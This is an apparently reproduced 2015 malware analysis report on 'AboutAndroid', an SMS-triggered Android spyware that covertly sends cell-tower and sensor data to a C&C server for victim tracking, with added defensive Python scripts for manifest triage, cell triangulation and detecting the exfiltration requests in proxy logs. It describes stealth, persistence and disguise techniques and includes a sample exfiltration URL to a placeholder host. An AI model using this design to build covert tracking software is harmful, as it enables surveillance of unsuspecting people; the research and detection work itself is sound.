Posted on 20-Jul-2015

447 views

Category:

Technology


5 download

TRANSCRIPT

Meet the Potnet

Next generation Privacy botnet

AboutAndroid | Malware Analysis Report

Eran Goldstein

Senior Cyber Security & Malware Researcher at ZIMPERIUM

GENERAL NOTES: THE FOLLOWING INFORMATION SUMMARIZES THE “POTNETS AND NEXT GENERATION BOTNET TECHNIQUES” RESEARCH PROCESS AND CONTAINS SENSITIVE INFORMATION. THIS PAPER ANALYZES IN DETAIL THE “ABOUTANDROID” ANDROID MALWARE AND BRINGS EVIDENCE THAT MOBILE DEVICES WILL GET MORE AND MORE INFECTED IN THE NEAR FUTURE, LEVERAGING SYSTEMS ALREADY USED ON THE FIXED SIDE.

WARNING: ABOUTANDROID IS A THREAT FOR BOTH USERS AND ORGANIZATIONS AS IT EXPOSES CLIENTS TO PRIVACY ISSUES. ALL THE TOOLS AND APPLICATIONS DEMONSTRATED IN THIS DOCUMENT WERE DEVELOPED FOR RESEARCH PURPOSES ONLY; IT IS STRONGLY RECOMMENDED THAT YOU DO NOT USE THESE TOOLS FOR ILLEGAL PURPOSES. ALL RIGHTS TO THE KEYWORDS “POTNET” AND “POTNETS” AND THEIR DEFINITION ARE REGISTERED AND RESERVED TO THE AUTHOR OF THIS MANUAL.

CLARIFICATION: WE WILL NOT BE RESPONSIBLE FOR ANY DAMAGE CAUSED BY USING THE TOOLS, APPLICATIONS OR TECHNIQUES DEMONSTRATED.

Table of Contents

Introduction
The next generation of privacy botnet
Suspicious Activity
Analysis
    Malware Sample
    Infection
    Operation
    Command and Control (C&C)
    Network Impact
Proof-of-Concept
Conclusions

Introduction

Cyber security researchers discovered a new technique and methodology of privacy botnet that allows an attacker to gain a user’s personal information, detailed location, movement and motion surveillance, area mapping and more.

The malware found was designed to work in stealth mode, running as a receiver behind a background system service. Once the attacker sends an SMS message containing a particular body text (for example, a question mark or a smiley) to the target device, the device sends out private information that does not require any special permission or dialog-box approval from the victim.

The core functionality, and the real advantage of the potnet (privacy botnet) from an attacker's point of view, is the ability to get different types of data from the victim's device, including cellular network information and other sensor data of the targeted victim.

The malware allows an attacker to obtain information about the geolocation and positioning of the target device. This data is calculated on the potnet C&C server and is then available to the attacker in order to track the target device's exact motions.

Diagram 1.0: Human tracking system

Next generation of privacy botnet

Potnets and the next generation of privacy botnets do not act as a banking Trojan: they are not designed to steal your banking credentials, log into your account or transfer your funds to criminals. They are the type of malware designed to track your motion, movement and geolocation, so that these can be used for social engineering and for advanced positioning and tracking techniques. The potnet malware that was found essentially does this by grabbing the victim’s information and sending it to certain websites. These websites are pre-specified by the attackers, and they are typically Command and Control (C&C) servers hosted anonymously at a third-party web hosting service.

The data that is collected is then processed on the server side in order to give the attacker an accurate picture of the victim. Because the client side of the malware does only a short amount of processing, the data sent to the server is minimized, which reduces the possibility of detection by client-side defense mechanisms. Using non-conventional device data allows the attacker to track victims located in low-connectivity or bad-signal environments, such as inside buildings and even underground (according to the cellular signal data).

Diagram 1.1: Tracking victims in low-connectivity or bad-signal environments

Suspicious Activity

In the next example we explain the suspicious activities of a potnet's malware through the code implementation and a demonstration of the AboutAndroid.apk malware. The AboutAndroid malware takes advantage of perfectly legitimate data that can be read without any special permission or dialog approval on the client side, which makes detecting potnet malware quite difficult. The AboutAndroid malware that was analyzed is suspicious due to the following symptoms and runtime activities:

1. Ability to obtain private data from the system without any prior information and without the user’s approval.

2. Ability to obtain private data from the system without any prior information and without any special permission.

3. Responsible for high energy consumption of the battery.

One of the harmful aspects of the potnet malware family is that once it enters the target mobile device, it is very difficult to detect it or to know the exact trigger used to send information or data out of the device.

Diagram 1.2: The Cell tower (cellid), Cellphone and the signal

Analysis

The AboutAndroid malware logs the user’s sensor and cellular network data.

Once executed, the malware registers an incoming broadcast receiver and then waits for a specific SMS text message, one that contains, for example, a smiley or a question mark as the message body. Once the SMS message arrives, the malware logs all activities related to specific sensor data and the cellular network information, including the cell id, LAC, MNC, MCC, etc., and sends them to the potnet C&C server.

Sending only a small amount of data to the C&C server at the backend reduces the possibility of detection by client-side defense mechanisms (such as anti-virus or other signature-based protection techniques). This methodology of calculating additional information related to the victim by correlating the collected data with third-party APIs and other web services is one of the advantages of potnets and the next generation botnets.

This kind of attack must use a strong social engineering lure in order to convince the user to click on a malicious link, or hope that the user will be tricked into installing an app. Once this is done, the AboutAndroid malware stays persistent on the victim device and can be triggered via SMS message.

Diagram 1.3: Triangulation is calculated according to the signal of every base-station (cell tower)

Malware Sample

The diagram below shows the VirusTotal report for an AboutAndroid malware sample: it was scanned by 56 different antivirus engines and found clean.

In an attempt to look like non-malicious software, the AboutAndroid malware uses the namespace “com.google.aboutandroid”.

Diagram 1.4: VirusTotal scan report

Infection

AboutAndroid can be delivered in different ways. For example, phishing spam can be used to lure the victim to an infected web site, where an embedded <iframe> causes the browser to automatically download a file called AboutAndroid.apk (or any other file name). The user must then install it by tapping the downloaded file and following the manual installation process.

Other techniques can be implemented using mobile application markets, third-party websites or Trojan-Downloaders.

Trojan-Downloaders are often distributed as part of the payload of another piece of malware, such as a Trojan-Dropper. Trojan-Downloaders may also be distributed as a file attachment to spam e-mails: you get an e-mail that seems to come from a high-profile company with an attached invoice (for example) in the form of a .doc or .pdf document. The invoice looks innocuous enough, but here's the catch: it can run a PDF reader exploit or Microsoft Word macros in order to install the malware.

Once installed, there is no application icon on the screen or any user interface to interact with.

This is because the malware has installed itself as a background service that only starts when the screen is unlocked by the user or when the device is rebooted.

The malware service listens for the ON_BOOT or USER_PRESENT intents.

The only evidence that the malware is installed is in the “Manage Applications” section of “Settings”, which shows that an application called “com.google.aboutandroid” is running.

You can get rid of the infection by uninstalling the application.

Diagram 2.0: Installation of AboutAndroid Malware POC

Operation

When the malware’s service starts, it registers a broadcast receiver in the background service and a SensorEventListener.

Diagram 2.1: The malware registers a sensor event listener

Once an SMS message containing ":-)" as its body text arrives at the device, the app logs the infected device’s sensor values and cellular network information and then opens a TCP connection to the primary potnet C&C server.

Diagram 2.2: Checking whether the SMS message contains ":-)" as body text
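The traits described in the Infection and Operation sections (a receiver that reacts to incoming SMS, persistence on boot or unlock, and no launcher icon) are all visible in a decoded AndroidManifest.xml, so they can be checked statically before any dynamic analysis. The triage script below is an added example written for this page, not code from the report or from Zimperium. The manifests it parses are constructed to mimic the described behaviour (only the package name com.google.aboutandroid comes from the report), and it assumes the standard Android intent actions android.provider.Telephony.SMS_RECEIVED, android.intent.action.BOOT_COMPLETED and android.intent.action.USER_PRESENT as the way the report's ON_BOOT/USER_PRESENT triggers appear in a real manifest.

```python
"""Static triage of a decoded AndroidManifest.xml for potnet-style stealth traits.
Added example for this page; not code from the report.  Decode the APK first
(e.g. with apktool) and pass the manifest path, or run as-is on the
constructed samples below."""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS

SMS_ACTION = "android.provider.Telephony.SMS_RECEIVED"
PERSIST_ACTIONS = {"android.intent.action.BOOT_COMPLETED",
                   "android.intent.action.USER_PRESENT"}

# Constructed manifest mimicking the behaviour the report describes: an SMS
# receiver, boot/unlock receivers, a collector service and an activity with
# no MAIN/LAUNCHER filter, so no icon appears after installation.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.google.aboutandroid">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="About Android">
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
    <service android:name=".CollectorService"/>
    <activity android:name=".HiddenActivity"/>
  </application>
</manifest>
"""

# Constructed benign manifest for contrast: a normal launcher activity,
# no SMS receiver and no boot persistence.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def _names(elem, tag):
    """Set of android:name values of all <tag> descendants of elem."""
    return {child.get(A_NAME) for child in elem.iter(tag)}


def triage_manifest(xml_text):
    """Return the package name, per-trait indicators, a score and a verdict."""
    root = ET.fromstring(xml_text)
    perms = _names(root, "uses-permission")
    receiver_actions = set()
    for receiver in root.iter("receiver"):
        receiver_actions |= _names(receiver, "action")
    has_launcher = any(
        "android.intent.action.MAIN" in _names(act, "action")
        and "android.intent.category.LAUNCHER" in _names(act, "category")
        for act in root.iter("activity"))
    indicators = {
        "sms_triggered": SMS_ACTION in receiver_actions,
        "persistence": bool(receiver_actions & PERSIST_ACTIONS),
        "no_launcher_icon": not has_launcher,
        "can_exfiltrate": "android.permission.INTERNET" in perms,
    }
    score = sum(indicators.values())
    # SMS trigger combined with a hidden install is the report's core pattern.
    verdict = ("suspicious" if indicators["sms_triggered"]
               and indicators["no_launcher_icon"] else "review")
    return {"package": root.get("package"), "score": score,
            "verdict": verdict, **indicators}


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for key, value in triage_manifest(text).items():
        print("%-18s %s" % (key, value))
```

The check deliberately does not require the SMS permission itself: the manifest traits are cheap to confirm, and the missing launcher filter is the same "no icon" symptom the report tells users to look for under Manage Applications.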

Command and Control (C&C)

Although a fairly simple command and control protocol is used to send data over an HTTP connection, the potnet C&C server compensates for this: it is predominantly used to access different APIs and web services in order to calculate additional information about the physical environment of the victim device and to perform a triangulation using the cell id and the neighboring cells' network information.

Diagram 2.3: The C&C server’s IP address

In addition, in order to translate the victim device's data into accurate and valuable motion-tracking information, the C&C server performs a geometric calculation correlated with the sensor data that was collected.

Diagram 2.4: Assigning the parameter values and preparing the HTTP request to the C&C server

The sensor data that is collected comes from more than seven different sensors, including the barometer, proximity sensor, linear acceleration sensor, gyroscope, temperature sensor, gravity sensor, light sensor and more.
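To judge how much location precision a server can extract from the cell id and signal fields the client sends (the triangulation of Diagram 1.3 and the geometric calculation above), here is a minimal reconstruction of that kind of estimate. It is an added example, not the report's or Zimperium's code, and the report does not state which algorithm the real server uses: the log-distance path-loss model, its reference values (-70 dBm at 1 km, exponent 3) and the inverse-square weighted centroid are assumptions, and the three tower positions and readings are constructed.

```python
"""Coarse location estimate from cell-tower positions and signal readings.
Added example for this page, not the report's code; the model and constants
are assumptions and the measurements are constructed."""
import math

# Assumed log-distance path-loss parameters: -70 dBm received at 1 km and a
# path-loss exponent of 3 (roughly urban).  Real networks vary widely.
REF_DBM_AT_1KM = -70.0
PATH_LOSS_EXP = 3.0


def rssi_to_distance_m(rssi_dbm, ref_dbm=REF_DBM_AT_1KM, n=PATH_LOSS_EXP):
    """Log-distance model: d = 1 km * 10 ** ((ref - rssi) / (10 n))."""
    return 1000.0 * 10 ** ((ref_dbm - rssi_dbm) / (10.0 * n))


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 points."""
    r = 6371000.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(a))


def estimate_position(cells):
    """cells: list of {cid, lat, lon, signal} for the serving and neighbouring
    cells.  Returns (lat, lon, uncertainty_m): an inverse-square-distance
    weighted centroid of the tower positions, with the modelled distance to
    the strongest tower as the uncertainty.  A single cell collapses to that
    tower's position with its modelled distance as the radius."""
    if not cells:
        raise ValueError("no cell measurements")
    dists = [rssi_to_distance_m(c["signal"]) for c in cells]
    if len(cells) == 1:
        return cells[0]["lat"], cells[0]["lon"], dists[0]
    weights = [1.0 / d ** 2 for d in dists]
    total = sum(weights)
    lat = sum(w * c["lat"] for w, c in zip(weights, cells)) / total
    lon = sum(w * c["lon"] for w, c in zip(weights, cells)) / total
    return lat, lon, min(dists)


# Constructed measurements: serving cell plus two neighbours.
SAMPLE_CELLS = [
    {"cid": 12345, "lat": 40.750, "lon": -73.980, "signal": -70},
    {"cid": 12346, "lat": 40.760, "lon": -73.970, "signal": -85},
    {"cid": 12347, "lat": 40.745, "lon": -73.965, "signal": -100},
]

if __name__ == "__main__":
    lat, lon, unc = estimate_position(SAMPLE_CELLS)
    print("estimate %.5f, %.5f  (+/- %.0f m)" % (lat, lon, unc))
```

With only the serving cell the estimate is no better than the tower's own position and a kilometre-scale radius; it is the neighbouring cells' measurements that tighten it, which is why the report's "neighbors network information" is the field worth watching for in outbound traffic.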

Network Impact

In the diagram below we can see the HTTP request that arrives from the victim device, intercepted in our Burp proxy. We can observe the different parameters that the app sends, for example:

client = the phone number of the client mobile device.

cid = the cell id that the mobile device is connected to.

lac = Local Area Code of the cellular network provider.

mnc = Network Code of the cellular base station antenna's provider.

mcc = Country Code of the cellular base station antenna.

signal = the signal strength measured by the mobile device from the cellular base station antenna (in dBm).

cell_lon = the longitude of the cellular base station antenna (before triangulation).

cell_lat = the latitude of the cellular base station antenna (before triangulation).
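The parameter set above is a usable network fingerprint. The script below is an added example, not code from the report: it scans a simple proxy export for requests that carry the four cell-identity fields plus a signal value, redacts the phone number in the client field before it reaches an alert record, and normalises the cell identity for later enrichment. It fires on the full request shown in Diagram 2.5 and also on a variant that omits cell_lon and cell_lat, since those are derived on the server side anyway. The request lines and the host name cnc.example.invalid are constructed placeholders; no indicators from the report are used.

```python
"""Flag AboutAndroid-style exfiltration requests in a proxy export.
Added example for this page; not code from the report.  Parameter names are
the ones the report lists in the intercepted request; hosts and values are
constructed placeholders, not indicators from the report."""
import re
from urllib.parse import urlsplit, parse_qs

# Fields the report lists in the intercepted request.
POTNET_PARAMS = {"client", "cid", "lac", "mnc", "mcc",
                 "signal", "cell_lon", "cell_lat"}
# Minimum set that identifies a serving cell; together with a signal value
# this is the detection condition, so dropping cell_lon/cell_lat still fires.
CELL_ID_PARAMS = {"mcc", "mnc", "lac", "cid"}

# Constructed proxy export: one "METHOD URL VERSION" request line per entry.
SAMPLE_LOG = """\
GET http://cnc.example.invalid/gate.php?client=%2B15550100&cid=12345&lac=678&mnc=10&mcc=310&signal=-87&cell_lon=-73.980&cell_lat=40.750 HTTP/1.1
GET http://www.example.com/weather?city=NYC&units=metric HTTP/1.1
POST http://api.example.com/v1/login HTTP/1.1
GET http://cnc.example.invalid/gate.php?client=%2B15550101&cid=12346&lac=678&mnc=10&mcc=310&signal=-72 HTTP/1.1
"""


def redact_msisdn(value):
    """Keep only the last four digits of a phone number for the alert record."""
    digits = re.sub(r"\D", "", value)
    return "*" * (len(digits) - 4) + digits[-4:] if len(digits) > 4 else "****"


def analyse_request(line):
    """Parse one request line and decide whether it matches the fingerprint."""
    method, url, _version = line.split(" ", 2)
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    matched = sorted(set(params) & POTNET_PARAMS)
    has_cell = CELL_ID_PARAMS <= set(params)
    alert = has_cell and "signal" in params
    record = {"method": method, "host": parts.hostname, "path": parts.path,
              "alert": alert, "matched": matched}
    if alert:
        record["client"] = redact_msisdn(params.get("client", ""))
        # (mcc, mnc, lac, cid) is the usual key for cell-location lookups.
        record["cell"] = (params["mcc"], params["mnc"],
                          params["lac"], params["cid"])
        record["signal_dbm"] = int(params["signal"])
        record["cell_position"] = (
            (float(params["cell_lat"]), float(params["cell_lon"]))
            if {"cell_lat", "cell_lon"} <= set(params) else None)
    return record


def scan_log(text):
    """Analyse every non-empty line of a proxy export."""
    return [analyse_request(l) for l in text.splitlines() if l.strip()]


def alerts(text):
    """Only the records that matched the fingerprint."""
    return [r for r in scan_log(text) if r["alert"]]


if __name__ == "__main__":
    for rec in alerts(SAMPLE_LOG):
        print(rec)
```

Matching on the parameter set rather than on a host name survives a change of C&C server, and redacting the MSISDN keeps the victim's number out of the SOC's alert store while still leaving the cell identity available for enrichment.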

Diagram 2.5: Intercepting the request from the victim device to the C&C server

Proof-of-Concept

After launching one of the malware’s hidden intents (an activity, not the main one), we can see how it looks in the diagram below. The AboutAndroid Malware POC is installed on the victim device and we are ready to begin our simple scenario.

Diagram 3.0: AboutAndroid Malware POC – an activity intent launched (not in hidden mode)

1. In order to track the victim, the attacker sends an SMS message with the text of “” to the victim device.

Diagram 3.1: The attacker is sending the SMS message

2. The victim receives the SMS message.

Diagram 3.2: No suspicious activities on the victim device

Diagram 3.3: The victim device receiving the SMS message

3. The attacker is now able to browse to the AboutAndroid potnet C&C server GUI console and get all the relevant and valuable information about the victim.

Diagram 3.4: AboutAndroid potnet C&C server – part 1: basic information, indicators and the Motion Detection module

Callout (diagram 3.2): We can’t observe any suspicious activity on the victim device.

In diagram 3.4 we can see that the basic information about our victim includes cellular network information, radio-signal-related data, the calculated device location, an “Inside building” indicator, a floor-level indicator, etc.

In addition, we can see the Motion Detection module (in the bottom right corner). The Motion Detection module shows us every exact motion of the victim device, triggered by any new movement of our human target.

TIP: It is recommended to search the internet for the movie clip of the full scenario of this proof-of-concept demonstration in order to see the full feature list of this AboutAndroid malware.

In diagram 3.5 we can see the calculated data for the victim, including triangulation data, base-station measurements and the estimated location of the victim device.

Diagram 3.5: AboutAndroid potnet C&C server – part 2: calculated data of the victim

Conclusions

It seems that running a standard antivirus sweep will not get rid of AboutAndroid or other potnet malware, and since the program doesn't really make its presence known, you may be in trouble if you find that you're already infected with it.

If you think you may have become infected by potnet malware, you should uninstall any suspicious app that you are not familiar with; otherwise, wipe your device and perform a “Factory reset”.

In my opinion, potnet malware tries to gain an advantage over the victim device by implementing an incoming broadcast receiver, sensor listeners and other non-conventional data techniques, which allow the malware to run in a quite stealthy mode and to get information from the victim device without any interruption to the user or the need for a dialog approval on the client’s side.

The AboutAndroid malware runs in the background as a service and its operation is not noticeable to the user. However, it will likely consume considerable battery power when active, which will raise suspicions. On the other hand, users with a capped data plan will hardly notice any change in the charges on their bill.

Once a specific app has been detected and a signature created for it, most mobile anti-virus products will be able to detect and remove the threat by uninstalling the malicious app.

Notes for Android Developers and Google Security Team

Giving applications direct access to hardware is dangerous. It would be better if permissions addressed sensor access. In addition, hardware should not provide more than what applications require, and should provide only abstractions, not raw data.

http://www.zimperium.com

www.zimperium.com, ZIMPERIUM and Zimperium logo are trademarks of ZIMPERIUM Inc. All other trademarks are the property of their respective owners. The information presented is subject to change without notice. ZIMPERIUM assumes no responsibility for inaccuracies contained herein.

Copyright © 2015 ZIMPERIUM Inc. All rights reserved.